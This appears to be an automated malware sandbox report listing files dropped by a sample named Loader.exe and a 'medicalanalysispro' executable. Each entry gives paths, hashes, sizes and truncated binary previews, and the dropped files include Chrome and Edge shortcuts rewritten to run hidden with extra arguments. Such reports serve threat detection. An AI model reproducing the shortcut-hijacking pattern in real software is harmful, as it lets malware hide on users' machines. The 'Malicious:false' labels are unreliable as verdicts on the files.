                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                                              MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                                              SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                                              SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                                              SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.493433469104717
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                                                                                                                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                                                                                                                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                                                                                                                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                                                                                                                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):35302
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Variations

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                                                                                                                                                                                              MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                                                                                                                                                                                              SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                                                                                                                                                                                              SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                                                                                                                                                                                              SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\e3a3dc5f-c0a8-42a5-8961-935d22629af4.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4197
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.485609105031492
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0q8NkGS1fWMbFPWQ58rh/cI9URoDoto8kBGWsv7jOQ6Jk2ceSDS4S4SDSJI4a:/8NBS/b4eoDU4pTQ2k2x
                                                                                                                                                                                                                                                                                                              MD5:6549DF8E29BAE649CD469F1225C7E91F
                                                                                                                                                                                                                                                                                                              SHA1:E426D740045FAF1366DBFA139A8CDBA7A9191AF1
                                                                                                                                                                                                                                                                                                              SHA-256:EAEA60BE9379D5B190DB57AC38141B399480FCB40749721AADB5C60EAE8221DD
                                                                                                                                                                                                                                                                                                              SHA-512:2CF82CAF8E7067F07EFC3D5CE946F147A53E867D10CE5D4C75B572EBFDAE4FCA8A996BFA44F24BF9E7D49068A3A5108BD89F8BA23A4556C6D5501D2193BDD660
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hsperfdata_user\5908

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.4224809483946004
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:NkvrXXT58GG2cDvgFHtMPApTLJmsJWTFmwZMbkT6DdiPWUH02UB:NkB8GG2cDvgcAZGNZCw
                                                                                                                                                                                                                                                                                                              MD5:72C89A0C222B7AB5C43CFB8547723DED
                                                                                                                                                                                                                                                                                                              SHA1:3D8F48DF499DFADB7209F0F4C09B549ECD617FE3
                                                                                                                                                                                                                                                                                                              SHA-256:5A176834BC5E202F0F1BF9D9DFBC3613BDC47039335536B357C9F19CF98F45AB
                                                                                                                                                                                                                                                                                                              SHA-512:83F00DDBC6548FE8BE49CDB2AABA22B606DC61B8D4B0400E4D35B73D748E3BBC19BE1705DEBF3B2C993C793ADA0441D3A4339925B93CB64496440C7EC6416534
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........X=.......\...... .......8...........J...0...sun.rt._sync_Inflations.....k.......8...........J...0...sun.rt._sync_Deflations.....e.......@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\medicalanalysispro.zip

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):154239
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9969082235627456
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:HE8gAlKJZNMaGFooU0Wf6cu4gH3efYmDuMieduvn3Oa:HE8BlKCaGF9Gf6cuDewmyye3Oa
                                                                                                                                                                                                                                                                                                              MD5:FC8A6506496F671C09F18E98E7A0A6D0
                                                                                                                                                                                                                                                                                                              SHA1:6A29746489F94EEFF8CA00E04BC6BED2542CA030
                                                                                                                                                                                                                                                                                                              SHA-256:C196CE2452FE376F2AD783B44B3CBC2F72E9457250E0DE4F95CDFB70440FD1E6
                                                                                                                                                                                                                                                                                                              SHA-512:F501D8FBFA32B994EE4C2E3D09E731674968131E4CEBE0860ED33F636F83548EFBA53E6650775AC5193DD3619E52E567EB4B99408CDDF82A9B65D708D3BA717B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........h%.Y................medicalanalysispro/PK........@%.Y($...Y...&..)...medicalanalysispro/medicalanalysispro.exe..|T..8>..n....@...."...$!.d.]...D..b..< ..5.%AA..H.u.Z.j..ZKmk....bB... ......V...........&......?~].;gf.9s.....U;...b..$....O... |..o.B..|u.^....E...=u...J7$.....z..V$..j..j..K..7.W.Z..8....d...o.....(..\=....F..s..4w_...?07...X.{h..Ue.).~...!.wF...c..q.d"....#.!.!.o,}.....QQ.}#..M.*....].I.......a..#.z......{/.p.(.5.<.J*.!B......$..p....i..3...^d.V..f.....[2....[J...2.6X.O..H.L..........c..%.u<..........0...!..>s.t..e.W*+l#.d......c..H;...J....t........<....u..i\.l9..N9.N.t...-....FKs.7.U.:...t..!.3`.....y...1Gl._.m....v........M..:vLS.[<./.v.......g6....F...W..| 0.).x#.R....}.....,...#^K.x.8...i..y%dv..b])..3!}~..i.R.....)..<#.:.:CZ...S:@...l.r...p........n.'%...I...W8..'.IN."N.}X5a...1..X%9...)w....RJ..4."......(8.pfv5X|.rZ..B...KX.,.."v;.....p....8)..V...|.m.s..._..)...3.....*..I....g.jj!D......-M.|'4EK........6#

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):206336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.174815206205745
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:/ahKyd2n31e5GWp1icKAArDZz4N9GhbkrNEk1ek/Wt5OGNMJA/T:/ahO2p0yN90QE8/Wt4ez7
                                                                                                                                                                                                                                                                                                              MD5:178A2A89CB76EFEA6DF50CC884991226
                                                                                                                                                                                                                                                                                                              SHA1:918B309AB3FF30BE807E073DF80596EFF5800CED
                                                                                                                                                                                                                                                                                                              SHA-256:357829B06C1C185E44EFA729DD8671487A43778A3BE1B6F46C7956F4D4CB49E2
                                                                                                                                                                                                                                                                                                              SHA-512:E72605C87BE8F7A2A0AEAC0AF61E7EF329EFFCB74C05C678692EA7A80F1086D1A4DD1217D6CDF463A12252D80062F052E8581EDDEA9BACD959BF620ACA01566A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......|.....................@....................................X.....`.......... ......................................<............t...................p.. .......T...........................................(... ............................text....{.......|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc............v..................@..@.reloc.. ....p.......$..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):210944
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.515127884918461
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:YfZnhZnKQ8GhYLpx6psBoac5/pvla1QQC2mCOSvWOOCaQOPBjJ7YQueuVuCjost:GJhZ/8GhYupsBfc5/LaY4WpxQOUZUs
                                                                                                                                                                                                                                                                                                              MD5:E3788F3C734D86FD84DA15A119BF460A
                                                                                                                                                                                                                                                                                                              SHA1:F90D041773B5BE025AC52AB14E51463272BE653C
                                                                                                                                                                                                                                                                                                              SHA-256:0C354269280D806288B0ED1AE7455E5A3B83A584C58006F0DF3626F374C2C284
                                                                                                                                                                                                                                                                                                              SHA-512:009D0FE0F7C08708F0BD3788B006EB5E1064A9CEFE69DED378998BD5DA103B8DD09DB7730992030655609C92FA726B3858A76F252E1739589642E4043C35B53B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............pZ..pZ..pZnB.Z..pZnB.ZQ.pZnB.Z..pZ..s[..pZ..t[..pZ..u[..pZ..Z..pZ..qZ..pZ..y[..pZ..p[..pZ...Z..pZ..r[..pZRich..pZ........................PE..L......[...........!.....d...................................................p......{_....@.............................D............@...............,.......P..........p...............................@............................................text...ib.......d.................. ..`.rdata.. ............h..............@..@.data...0.... ......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nscB629.tmp\UAC.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.715583967305762
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:DiF6v2imI36Op/tGZGfWxdyWHD0I53vLl7WVl8e04IpDlPjs:DGVY6ClGoWxXH75T1WVl83lLs
                                                                                                                                                                                                                                                                                                              MD5:ADB29E6B186DAA765DC750128649B63D
                                                                                                                                                                                                                                                                                                              SHA1:160CBDC4CB0AC2C142D361DF138C537AA7E708C9
                                                                                                                                                                                                                                                                                                              SHA-256:2F7F8FC05DC4FD0D5CDA501B47E4433357E887BBFED7292C028D99C73B52DC08
                                                                                                                                                                                                                                                                                                              SHA-512:B28ADCCCF0C33660FECD6F95F28F11F793DC9988582187617B4C113FB4E6FDAD4CF7694CD8C0300A477E63536456894D119741A940DDA09B7DF3FF0087A7EADA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.?NB.lNB.lNB.li..lEB.lNB.l.B.li..lMB.li..lOB.li..lOB.li..lOB.lRichNB.l................PE..L...@.dU...........!.....,...........).......@...............................p.......................................;..<....3..x....P.......................`..........................................................\............................text....+.......,.................. ..`.data...d....@.......0..............@....rsrc........P.......2..............@..@.reloc.......`.......4..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):45
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9111711733157262
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                                                                                                                                              MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                                                                                                                                              SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                                                                                                                                              SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                                                                                                                                              SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................J2SE.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 12:40:12 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2700
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6707458756863716
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8STdfTXdanRYrnvsYd/KRkdAoEuN0dAKR+/KR2eHynP:8SJ4SvEu1eHy
                                                                                                                                                                                                                                                                                                              MD5:CE453E67433580DF5C036C66C2C67D0E
                                                                                                                                                                                                                                                                                                              SHA1:256BF8044515BDB35E3615EF1E300F5F5F013418
                                                                                                                                                                                                                                                                                                              SHA-256:D234DB9D952DAAF0508056647467075247AEE783133018B321782458B800EB0B
                                                                                                                                                                                                                                                                                                              SHA-512:1D0609886819A1C8D11498E1F97F43B1B70608C5FE03C4C83C788F2769D1A01BA5F0DE4AFE4F4128EF71FB4F800F77E6B04E6F70B417E60CB743A8598DAD78BD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ......,....}..L.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.H..PROGRA~1..t......O.IDW&l....B...............J.......8.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW)l..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Wed Oct 4 12:34:48 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2792
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.754849194536135
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8dQG2dOyW+YusJ2JrnzTdRdiuNqdLXuHj0PkZy+7:8bVSlQuQuD0PkZy
                                                                                                                                                                                                                                                                                                              MD5:3367FCBE8B07852970C508FB8CDC88B5
                                                                                                                                                                                                                                                                                                              SHA1:68132C5DCE6303995FE94C1341F0744D3775D1B6
                                                                                                                                                                                                                                                                                                              SHA-256:64D6EB2F2925CB69704C1512F8BB8FF4B08123ACF4BED36256D6F2D06E9DB20B
                                                                                                                                                                                                                                                                                                              SHA-512:A9F661DB7AFAC33ED6FCE6B3BF1E135DEE7EEB65ABC866DCE651DA1CCAE580971DD2D2D9C03632B0DB6A56598BF32B6A9D8766CC3B45E4F1CC32FC9F94BFCFC8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. .....|.K...e[P......?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....DW-F..PROGRA~2.........O.IDW&l....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.`..MICROS~1..D......(Ux.DWUl..........................6|..M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.DWUl...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.DWUl..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.DWUl....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.N.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2741
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.692616203873556
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8S7dBT6DpRYrnv3d/KRkdAoEuN0dAKR+/KR2egy8Ec:8SnhhEu1egyd
                                                                                                                                                                                                                                                                                                              MD5:C28021B6C0DA12B7779C8F4A749893E0
                                                                                                                                                                                                                                                                                                              SHA1:CC0E847B15BBB32AF63D10A81BE287AF63287B82
                                                                                                                                                                                                                                                                                                              SHA-256:FFD0BC4EDAA108EADA643BCFFBA93015424DB3DD739DCF3775E3EC4C05377697
                                                                                                                                                                                                                                                                                                              SHA-512:41F72EB71864BBF8EB2AD03CD71D4E41E820E805532382DB0BA01AB594D118A4F23FDF69B7431D93EDAD981E5B7C9F0A1F74DE4DBE1B960365CA6AE60805BA49
